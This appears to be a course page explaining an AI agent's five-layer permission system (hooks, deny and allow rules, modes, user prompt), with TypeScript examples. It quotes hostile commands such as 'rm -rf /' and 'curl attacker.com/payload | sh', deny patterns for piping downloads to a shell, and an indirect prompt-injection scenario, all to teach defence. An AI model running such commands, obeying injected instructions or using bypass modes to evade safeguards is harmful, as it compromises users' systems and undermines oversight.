Hooks & Permissions — Transformer Math

Module 55 · AI Engineering

🔒 Hooks & Permissions

A shell script you wrote can veto any tool call before Claude even sees the result

Status:

An AI agent that can run shell commands and edit files needs safety gates. The permission system is a 5-layer hierarchy: hooks, deny rules, allow rules, permission mode, and interactive approval. Each layer is checked in order — the first match wins.

Hooks — shell scripts that run before/after tool calls, highest priority
Deny/Allow rules — pattern-based rules in settings.json
Permission modes — bypassPermissions, plan, acceptEdits, default, dontAsk (varies by build)
Interactive prompt — ask the user as last resort

🎮

Permission Check Flow

What you are seeing

A tool call flows through 5 permission layers in order. The first layer that makes a decision (allow or deny) short-circuits — later layers are not checked. Hooks have highest priority because they represent enterprise policy.

What to try

Trace different tool calls through the layers. A Bash(npm test) with a matching allow rule skips layers 4-5. A Bash(rm -rf /) hits a deny rule at layer 2 and never reaches the user.

Try It: Permission Simulator

Permission System Simulator

Configure rules and test tool calls to trace the 5-layer permission decision.

Permission Mode

Prompt user for any tool not covered by policy rules

Allow Rules

ReadBash(npm test)

Deny Rules

Bash(rm *)Bash(curl *)

Load Preset

Test a Tool Call

Custom Tool Call

Click a tool call above to see the decision trace

💡

The Intuition

How a Tool Call Flows Through All 5 Layers

Each tool call passes through layers in order. The first layer that matches determines the result — later layers are skipped.

Tool call	L1 Hooks	L2 Deny	L3 Allow	L4 Mode	L5 User	Result
`Read("src/main.ts")`	pass	pass	MATCH "Read"	—	—	ALLOW
`Bash("npm test")`	pass	pass	MATCH "Bash(npm*)"	—	—	ALLOW
`Bash("rm -rf /")`	pass	MATCH "Bash(rm*)"	—	—	—	DENY
`Edit("config.json")`	pass	pass	no match	acceptEdits → allow	—	ALLOW
`Bash("curl x.com")`	pass	pass	no match	default	ASK	ASK USER

Why 5 Layers?

Different stakeholders need different control points. Enterprise admins enforce organization-wide policy via hooks (layer 1) and deny rules (layer 2) — individual users cannot override these. Project maintainers set allow rules (layer 3) for common safe operations. Individual users choose their permission mode (layer 4). The interactive prompt (layer 5) is the catch-all for anything not covered by rules.

Hooks Are Shell Commands

Hook event types include PreToolUse, PostToolUse, and others depending on the agent framework version. Hooks are arbitrary shell scripts — they receive the tool name and input as JSON on stdin, and their exit code determines the outcome. This makes them infinitely extensible: call an external policy service, log to a SIEM, scan for secrets, enforce directory restrictions. The hook interface is inspired by git hooks— the same shell-script-with-exit-code pattern that's proven effective for decades.

💡 Tip · Hooks can also modify tool input. If the hook writes JSON to stdout, that JSON replaces the original input. This enables input sanitization (redact secrets), normalization (resolve relative paths), or augmentation (add required flags) — all without changing the agent code.

Permission Modes

Modes control the default behavior when no hook or rule matches. Core modes (names may vary across agent versions):

bypassPermissions — all tools auto-approved (dangerous, for trusted automation)
plan — only read-only tools allowed, writes blocked
acceptEdits — file edits auto-approved, shell commands require approval
default — everything requires approval unless matched by allow rules
auto / dontAsk — additional modes in some versions that reduce interruptions for pre-approved tool patterns

✨ Insight · The permission check is the boundary between untrusted AI output and trusted execution. The LLM can hallucinate any command — the permission system ensures only approved commands actually run.

PostToolUse: What Happens After Execution

PreToolUse hooks run before a tool call and can block it. PostToolUse hooks run after the tool completes and receive the tool output — they cannot undo execution, but they enable a different set of capabilities: audit logging, output scanning, and side-effect triggering. Example use cases: a PostToolUse hook on the Bash tool that logs every executed command with its stdout to a SIEM; a hook that scans file edit output for accidental secrets (API keys, passwords) and alerts before the change is committed; a hook that triggers a test run after every Write tool call. PostToolUse hooks can also implement output modification for MCP tools — by returning hookSpecificOutput.updatedMCPToolOutput, the hook replaces the MCP tool result before it enters the agent's context window. Note: output replacement is only supported for MCP tools, not for built-in tools like Bash or Edit.

Indirect Prompt Injection and Why It Matters

The most dangerous attack vector for an agent with tool access is not a user typing a malicious prompt — it's indirect prompt injection (Greshake et al., 2023): content retrieved by a tool that contains hidden instructions. For example, the agent reads a file that contains . PreToolUse deny rules protect the output side of this: even if the injected instruction causes the model to generate a Bash(curl attacker.com/payload | sh) tool call, the deny rule blocks it before it runs. This is why deny rules covering network exfiltration patterns (Bash(curl * | sh), Bash(wget * | bash)) are high-value security controls, not just safety theater.

Quick Check

In what order are permission layers checked?

📐

Key Code Patterns

Permission Check Pipeline

typescript

async function checkPermission(
  tool: Tool,
  input: ToolInput,
  hooks: Hooks,
  rules: Rules,
  mode: PermissionMode
): Promise<PermissionResult> {
  // Layer 1: Pre-tool hooks (highest priority)
  for (const hook of hooks.preToolUse) {
    const result = await runShell(hook.command, { stdin: JSON.stringify({ tool, input }) });
    if (result.exitCode === 0) {
      // exit 0 = hook passed (continue to next layer)
      // Input modification via hookSpecificOutput.updatedInput in JSON stdout
      const json = result.stdout ? JSON.parse(result.stdout) : {};
      if (json.hookSpecificOutput?.updatedInput) input = json.hookSpecificOutput.updatedInput;
      // Note: exit 0 does NOT unconditionally allow — subsequent layers still run
    } else if (result.exitCode === 2) {
      return { decision: "deny", reason: result.stderr }; // explicit deny
    }
    // other nonzero = non-blocking error (tool continues)
  }

  // Layer 2: Deny rules (absolute blocks)
  for (const rule of rules.alwaysDeny) {
    if (matches(rule, tool, input)) return { decision: "deny" };
  }

  // Layer 3: Allow rules (auto-approve patterns)
  for (const rule of rules.alwaysAllow) {
    if (matches(rule, tool, input)) return { decision: "allow" };
  }

  // Layer 4: Permission mode
  if (mode === "bypassPermissions") return { decision: "allow" };
  if (mode === "plan" && !tool.isReadOnly()) return { decision: "deny" };
  if (mode === "acceptEdits" && ["Edit", "Write"].includes(tool.name)) return { decision: "allow" };

  // Layer 5: Ask user (interactive TUI dialog)
  return promptUser(tool, input);
}

Hook Execution

typescript

async function runHook(
  hookCommand: string,
  toolName: string,
  toolInput: ToolInput
): Promise<HookResult> {
  // Execute a shell hook and interpret the result
  const stdinData = JSON.stringify({ tool: toolName, input: toolInput });

  const result = await runProcess(hookCommand, {
    input: stdinData,
    captureOutput: true,
    timeout: 600_000,  // 10min default — configurable via hook.timeout field
  });

  if (result.exitCode === 0) {
    // exit 0: parse stdout JSON for structured response
    // To modify input, return hookSpecificOutput.updatedInput in the JSON
    const json = result.stdout ? JSON.parse(result.stdout) : {};
    const updatedInput = json.hookSpecificOutput?.updatedInput ?? toolInput;
    return { decision: "allow", input: updatedInput };
  } else if (result.exitCode === 2) {
    // exit 2: blocking error — tool call is denied, stderr shown to user
    return { decision: "deny", reason: result.stderr };
  } else {
    // other nonzero: non-blocking error — logged, tool proceeds
    console.warn(`Hook failed: ${result.stderr}`);
    return { decision: "continue", input: toolInput };
  }
}

Pattern Matching for Allow/Deny Rules

typescript

function matches(rulePattern: string, toolName: string, toolInput: ToolInput): boolean {
  // Match tool calls against rule patterns
  //
  // Patterns:
  //   "Read"              → matches all Read tool calls
  //   "Bash(npm test)"    → matches Bash with 'npm test' in command
  //   "Edit(src/**)"      → matches Edit with file_path matching glob

  // Parse pattern: "ToolName(argument_pattern)"
  const match = rulePattern.match(/^(\w+)(?:\((.+)\))?$/);
  if (!match) return false;

  const [, ruleTool, ruleArg] = match;

  if (ruleTool !== toolName) return false;
  if (ruleArg === undefined) return true;  // matches all calls to this tool

  // Check if argument pattern appears in any input field
  return Object.values(toolInput).some(v => String(v).includes(ruleArg));
}

🔧

Break It — See What Happens

No hooks layer

Bypass all permissions

📊

Real-World Numbers

Metric	Value
Permission layers	5 (hooks → deny → allow → mode → prompt)
Hook event types	Multiple: PreToolUse, PostToolUse, and others (varies by version)
Hook timeout	10 minutes default (configurable per hook via timeout field)
Exit code semantics	0=success (stdout JSON processed), 2=blocking error (stderr shown), other nonzero=non-blocking error (logged, tool proceeds)
Permission modes	bypassPermissions, plan, acceptEdits, default, dontAsk (auto in some builds)
Config sources	3 (user, project, enterprise MDM)

✨ Insight · Hook failure mode is "fail open" (any nonzero exit code other than 2 = non-blocking error, tool continues). This prevents a broken hook from permanently blocking the agent. The alternative — fail closed — is safer in theory but causes support tickets when a hook has a bug and blocks all tool execution.

🧠

Key Takeaways

What to remember for interviews

1Five permission layers are checked in strict order — hooks → deny rules → allow rules → permission mode → user prompt — with the first match short-circuiting all later layers.
2Hooks support multiple types (command, HTTP, prompt, agent). For command hooks: exit 0 succeeds (input modification via hookSpecificOutput.updatedInput in JSON stdout), exit 2 is a blocking deny (stderr shown to user), other nonzero is a non-blocking error (tool proceeds) — fail-open prevents broken hooks from freezing the agent.
3PostToolUse hooks receive tool output and can implement audit logging and secret scanning. Output replacement via hookSpecificOutput.updatedMCPToolOutput is supported for MCP tools only — not for built-in tools like Bash or Edit.
4Indirect prompt injection (malicious instructions hidden in file contents) is defeated by deny rules that block dangerous shell patterns like 'curl * | sh' before they execute.
5Bypass mode auto-approves every tool call — appropriate for trusted CI pipelines, but removes the human-in-the-loop safety boundary for interactive use.

📚

Interview Questions

Difficulty:

Company:

Showing 4 of 4

Design a permission system for AI tool execution that's extensible by enterprise admins.

★★★

AnthropicGoogle

How would you implement user-configurable hooks that can modify tool inputs?

★★☆

OpenAI

What's the security model when the AI can call shell commands?

★★★

AnthropicMeta

Design a hook system that prevents supply-chain attacks through MCP servers while remaining usable for legitimate plugins.

★★★

Anthropic

←

🧠 Memory System

📋 Prompt Engineering (System)

→